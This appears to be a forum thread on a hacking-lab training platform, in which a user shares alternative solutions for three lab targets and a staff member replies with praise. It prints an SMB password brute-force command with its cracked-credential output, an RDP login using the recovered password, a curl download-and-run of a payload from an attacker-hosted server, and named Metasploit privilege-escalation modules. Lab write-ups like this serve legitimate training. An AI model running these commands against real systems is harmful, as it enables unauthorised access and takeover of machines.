Immerser
Immerser
Silver IFor target 1 there was an much easier way:
just bruteforce the password of the administrator and login as administrator.
┌──(kali㉿iml-kali)-[~/Desktop]
└─$ nxc smb 10.102.139.31 -u administrator -p /usr/share/wordlists/rockyou.txt
SMB 10.102.139.31 445 IML-WIN1018 [*] Windows 10 / Server 2016 Build 17134 x64 (name:IML-WIN1018) (domain:IML-Win1018) (signing:False) (SMBv1:False)
...
SMB 10.102.139.31 445 IML-WIN1018 [+] IML-Win1018\administrator:blink182 then RDP to the box:
xfreerdp /v:10.102.139.31 /u:administrator /p:blink182 /dynamic-resolution /cert-ignore +clipboard +drives /drive:root,/home/kaliso, there's no need to use the IMLuser. But I admit, that would generate a lot of noise :)
for target 2 in the os-shell of sqlmap you can also use curl to transfer the files:
> curl http://10.102.12.205:8000/shell.exe -o c:\users\iis-admin\shell.exe
> c:\users\iis-admin\shell.exeand I've used the exploit-suggester and the module exploit/windows/local/ms16_075_reflection_juicy to successfully escalate my privileges.
same for target 3:
create a file with msfvenom and transfer it to the target. and let the exploit-suggester running to just find out that exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move works :)
Immersernice one steven . For the bruteforce, just remember that our rockyou.txt has been truncated to save space. this would not be feasible in real life, but good hack. As for the others, love the usage of Metasploit modules to escalate. Well done!
